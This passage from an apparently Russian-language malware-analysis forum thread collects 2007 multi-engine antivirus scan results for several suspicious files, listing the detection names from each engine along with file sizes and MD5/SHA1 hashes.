NOD32v2	2560	2007.09.30	a variant of Win32/PSW.LdPinch.NCB
Norman	5.80.02	2007.09.28	-
Panda	9.0.0.4	2007.09.29	Suspicious file
Prevx1	V2	2007.09.30	-
Rising	19.42.61.00	2007.09.30	-
Sophos	4.22.0	2007.09.30	Mal/Basine-C
Sunbelt	2.2.907.0	2007.09.28	VIPRE.Suspicious
Symantec	10	2007.09.30	-
TheHacker	6.2.6.073	2007.09.28	-
VBA32	3.12.2.4	2007.09.29	-
VirusBuster	4.3.26:9	2007.09.29	-
Webwasher-Gateway	6.0.1	2007.09.28	Heuristic.Crypted
Additional information
File size: 157696 bytes
MD5: 830971e08f67c563abf31ed2b6b73047
SHA1: 7ae6450c3fe81e9a59af7e3dd882ccac606861e3
packers: ASProtect
packers: PE_Patch, Aspack
packers: PE_Patch
Sunbelt info: VIPRE.Suspicious is a generic detection for potential threats that are deemed suspicious through heuristics.
```





Antivirus 	Version 	Last Update 	Result


```
AhnLab-V3	2007.9.29.0	2007.09.28	-
AntiVir	7.6.0.18	2007.09.28	HEUR/Crypted
Authentium	4.93.8	2007.09.29	Possibly a new variant of W32/Backdoor-based
Avast	4.7.1043.0	2007.09.29	-
AVG	7.5.0.488	2007.09.30	-
BitDefender	7.2	2007.09.30	MemScan:Trojan.PWS.LdPinch.BSJ
CAT-QuickHeal	9.00	2007.09.29	(Suspicious) - DNAScan
ClamAV	0.91.2	2007.09.30	-
DrWeb	4.33	2007.09.29	-
eSafe	7.0.15.0	2007.09.29	Suspicious Trojan/Worm
eTrust-Vet	31.2.5169	2007.09.27	-
Ewido	4.0	2007.09.29	-
FileAdvisor	1	2007.09.30	-
Fortinet	3.11.0.0	2007.09.30	-
F-Prot	4.3.2.48	2007.09.29	-
F-Secure	6.70.13030.0	2007.09.29	-
Ikarus	T3.1.1.12	2007.09.30	Backdoor.Win32.Hupigon.aco
Kaspersky	7.0.0.125	2007.09.30	-
McAfee	5130	2007.09.28	-
Microsoft	1.2803	2007.09.30	-
NOD32v2	2560	2007.09.30	a variant of Win32/PSW.LdPinch.NCB
Norman	5.80.02	2007.09.28	-
Panda	9.0.0.4	2007.09.29	Suspicious file
Prevx1	V2	2007.09.30	-
Rising	19.42.61.00	2007.09.30	-
Sophos	4.22.0	2007.09.30	Mal/Basine-C
Sunbelt	2.2.907.0	2007.09.28	VIPRE.Suspicious
Symantec	10	2007.09.30	-
TheHacker	6.2.6.073	2007.09.28	-
VBA32	3.12.2.4	2007.09.29	-
VirusBuster	4.3.26:9	2007.09.29	-
Webwasher-Gateway	6.0.1	2007.09.28	Heuristic.Crypted
Additional information
File size: 161280 bytes
MD5: 6d4cc6d0c9a54a042f889719e6be530d
SHA1: 9926b8be0d176fffdfa892c35d79fc45d0905331
packers: PE_Patch, Aspack
packers: PE_Patch
Sunbelt info: VIPRE.Suspicious is a generic detection for potential threats that are deemed suspicious through heuristics.
```

----------


## drongo

*T=12819*



```
Файл avz00002.dta получен 2007.10.02 10:18:06 (CET)
Антивирус	Версия	Обновление	Результат
AhnLab-V3	2007.10.2.1	2007.10.02	-
AntiVir	7.6.0.18	2007.10.02	TR/Crypt.XDR.Gen
Authentium	4.93.8	2007.10.02	-
Avast	4.7.1043.0	2007.10.02	-
AVG	7.5.0.488	2007.10.01	Agent.IIQ
BitDefender	7.2	2007.10.02	-
CAT-QuickHeal	9.00	2007.10.02	Backdoor.IRCBot.aiv
ClamAV	0.91.2	2007.10.02	-
DrWeb	4.44.0.09170	2007.10.02	-
eSafe	7.0.15.0	2007.10.01	-
eTrust-Vet	31.2.5178	2007.10.01	-
Ewido	4.0	2007.10.01	-
FileAdvisor	1	2007.10.02	-
Fortinet	3.11.0.0	2007.10.02	W32/IRCBot.AIV!tr.bdr
F-Prot	4.3.2.48	2007.10.01	-
F-Secure	6.70.13030.0	2007.10.02	Backdoor.Win32.IRCBot.aiv
Ikarus	T3.1.1.12	2007.10.02	-
Kaspersky	7.0.0.125	2007.10.02	Backdoor.Win32.IRCBot.aiv
McAfee	5131	2007.10.01	-
Microsoft	1.2803	2007.10.02	-
NOD32v2	2564	2007.10.02	probably a variant of Win32/Agent.NHJ
Norman	5.80.02	2007.10.01	-
Panda	9.0.0.4	2007.10.01	Suspicious file
Prevx1	V2	2007.10.02	Heuristic: Suspicious Hijacker
Rising	19.43.10.00	2007.10.02	-
Sophos	4.22.0	2007.10.02	-
Sunbelt	2.2.907.0	2007.10.02	-
Symantec	10	2007.10.02	W32.Kassbot
TheHacker	6.2.6.075	2007.10.01	-
VBA32	3.12.2.4	2007.10.02	Backdoor.Win32.IRCBot.aiv
VirusBuster	4.3.26:9	2007.10.01	-
Webwasher-Gateway	6.0.1	2007.10.02	Trojan.Crypt.XDR.Gen
Дополнительная информация
File size: 259072 bytes
MD5: 6bd23250246a394f61adfe3c5cdf4088
SHA1: fcfd8c0e055d9753100696a93495d295d2ed2700
Prevx info: http://fileinfo.prevx.com/fileinfo.asp?PX5=22CB97F900D49072F4BE0398C6870800E6B63981
```

----------


## mayas

File my_proga.exe received on 10.03.2007 21:47:53 (CET)
Current status: Loading ... queued waiting scanning finished NOT FOUND STOPPED
Result: 6/32 (18.75%)




```
Antivirus 	Version 	Last Update 	Result
AhnLab-V3	2007.10.3.0	2007.10.02	-
AntiVir	7.6.0.18	2007.10.03	DR/Delphi.Gen
Authentium	4.93.8	2007.10.03	-
Avast	4.7.1051.0	2007.10.03	-
AVG	7.5.0.488	2007.10.03	Obfustat.RNQ
BitDefender	7.2	2007.10.03	-
CAT-QuickHeal	9.00	2007.10.03	-
ClamAV	0.91.2	2007.10.03	-
DrWeb	4.44.0.09170	2007.10.03	-
eSafe	7.0.15.0	2007.10.02	-
eTrust-Vet	31.2.5183	2007.10.03	-
Ewido	4.0	2007.10.03	-
FileAdvisor	1	2007.10.03	-
Fortinet	3.11.0.0	2007.10.03	-
F-Prot	4.3.2.48	2007.10.03	-
F-Secure	6.70.13030.0	2007.10.03	-
Ikarus	T3.1.1.12	2007.10.03	Virus.Win32.Zapchast.DA
Kaspersky	7.0.0.125	2007.10.03	-
McAfee	5133	2007.10.03	-
Microsoft	1.2908	2007.10.03	-
NOD32v2	2569	2007.10.03	-
Norman	5.80.02	2007.10.03	-
Panda	9.0.0.4	2007.10.03	-
Prevx1	V2	2007.10.03	-
Rising	19.43.20.00	2007.10.03	-
Sophos	4.22.0	2007.10.03	Mal/Dropper-T
Sunbelt	2.2.907.0	2007.10.02	-
Symantec	10	2007.10.03	-
TheHacker	6.2.6.076	2007.10.03	-
VBA32	3.12.2.4	2007.10.03	-
VirusBuster	4.3.26:9	2007.10.03	Trojan.Agent.JVF
Webwasher-Gateway	6.0.1	2007.10.03	Trojan.Delphi.Gen
Additional information
File size: 46080 bytes
MD5: 17ff44f341c1040e3c68ae1801d11d56
SHA1: cc9e9e3a33a0533f2b17facde6f10cc4abd0952d
```

----------


## V_Bond

ntos.exe из темы http://virusinfo.info/showthread.php...816#post139816
AhnLab-V3	2007.10.5.0	2007.10.04	-
AntiVir	7.6.0.20	2007.10.04	*TR/Hijacker.A*
Authentium	4.93.8	2007.10.03	-
Avast	4.7.1051.0	2007.10.04	-
AVG	7.5.0.488	2007.10.04	*PSW.Ldpinch.PZE*
BitDefender	7.2	2007.10.04	*BehavesLike:Win32.ProcessHijack*
CAT-QuickHeal	9.00	2007.10.03	-
ClamAV	0.91.2	2007.10.04	-
DrWeb	4.44.0.09170	2007.10.04	*Trojan.Inject.433*
eSafe	7.0.15.0	2007.10.02	-
eTrust-Vet	31.2.5185	2007.10.04	-
Ewido	4.0	2007.10.04	-
FileAdvisor	1	2007.10.04	-
Fortinet	3.11.0.0	2007.10.04	-
F-Prot	4.3.2.48	2007.10.03	-
F-Secure	6.70.13030.0	2007.10.04	-
Ikarus	T3.1.1.12	2007.10.04	*Trojan.Delf.NEB*
Kaspersky	7.0.0.125	2007.10.04	*Trojan.Win32.Delf.ahr*
McAfee	5134	2007.10.04	-
Microsoft	1.2908	2007.10.04	-
NOD32v2	2572	2007.10.04	-
Norman	5.80.02	2007.10.04	-
Panda	9.0.0.4	2007.10.04	*Trj/Wsnpoem.IJ*
Prevx1	V2	2007.10.04	-
Rising	19.43.30.00	2007.10.04	-
Sophos	4.22.0	2007.10.04	-
Sunbelt	2.2.907.0	2007.10.04	-
Symantec	10	2007.10.04	*Infostealer.Banker.C*
TheHacker	6.2.6.076	2007.10.03	-
VBA32	3.12.2.4	2007.10.03	-
VirusBuster	4.3.26:9	2007.10.04	-
Webwasher-Gateway	6.0.1	2007.10.04	*Trojan.Hijacker.A*
Дополнительная информация
File size: 522240 bytes
MD5: dc303cfc03b5aefe0a1438d80833e73e
SHA1: e886e10d4feb849a5ed1194ec9f72649f57a5134

----------


## TANUKI

Файл msntaduo.-exe получен 2007.10.05 03:03:26 (CET)

Результат: 22/32 (68.75%)


Антивирус 	Версия 	Обновление 	Результат
AhnLab-V3	2007.10.5.0	2007.10.04	-
*AntiVir	7.6.0.20	2007.10.04	TR/PSW.LdPinch.TAW.203*
Authentium	4.93.8	2007.10.04	-
Avast	4.7.1051.0	2007.10.04	-
*AVG	7.5.0.488	2007.10.04	Downloader.Generic5.PGH*
*BitDefender	7.2	2007.10.05	Trojan.PWS.LDPinch.TAW
CAT-QuickHeal	9.00	2007.10.03	TrojanDownloader.Small.ert*
ClamAV	0.91.2	2007.10.04	-
*DrWeb	4.44.0.09170	2007.10.04	Trojan.Packed.166*
eSafe	7.0.15.0	2007.10.04	-
eTrust-Vet	31.2.5187	2007.10.04	-
Ewido	4.0	2007.10.04	-
*FileAdvisor	1	2007.10.05	High threat detected
Fortinet	3.11.0.0	2007.10.04	W32/AvPak.ERT!tr.dldr*
F-Prot	4.3.2.48	2007.10.04	-
*F-Secure	6.70.13030.0	2007.10.05	Trojan-Downloader.Win32.Small.ert*
*Ikarus	T3.1.1.12	2007.10.05	Trojan-Downloader.Win32.Small.cyn
Kaspersky	7.0.0.125	2007.10.05	Trojan-Downloader.Win32.Small.ert
McAfee	5134	2007.10.04	Downloader-BED
Microsoft	1.2803	2007.10.04	VirTool:Win32/Obfuscator.P
NOD32v2	2572	2007.10.04	probably a variant of Win32/Obfuscated
Norman	5.80.02	2007.10.04	W32/DLoader.DBPR
Panda	9.0.0.4	2007.10.05	Trj/Downloader.MDW*
Prevx1	V2	2007.10.05	-
*Rising	19.43.30.00	2007.10.04	Packer.RyCrypt
Sophos	4.22.0	2007.10.05	Mal/Generic-A
Sunbelt	2.2.907.0	2007.10.04	Trojan-Downloader.Win32.Small.ert
Symantec	10	2007.10.05	Downloader*
TheHacker	6.2.6.076	2007.10.03	-
*VBA32	3.12.2.4	2007.10.03	Trojan-Downloader.Win32.Small.ert
VirusBuster	4.3.26:9	2007.10.04	Trojan.DR.Cimuz.Gen.1
Webwasher-Gateway	6.0.1	2007.10.04	Trojan.PSW.LdPinch.TAW.203*
Дополнительная информация
File size: 5837 bytes
MD5: 23a745097e5e6c922e6cb997c97b3915
SHA1: 5138598fd94125e0f086938285edccb2c3b7da5d

----------


## Shu_b

Заканчиваем пятую серию, и переходим в шестую.

----------

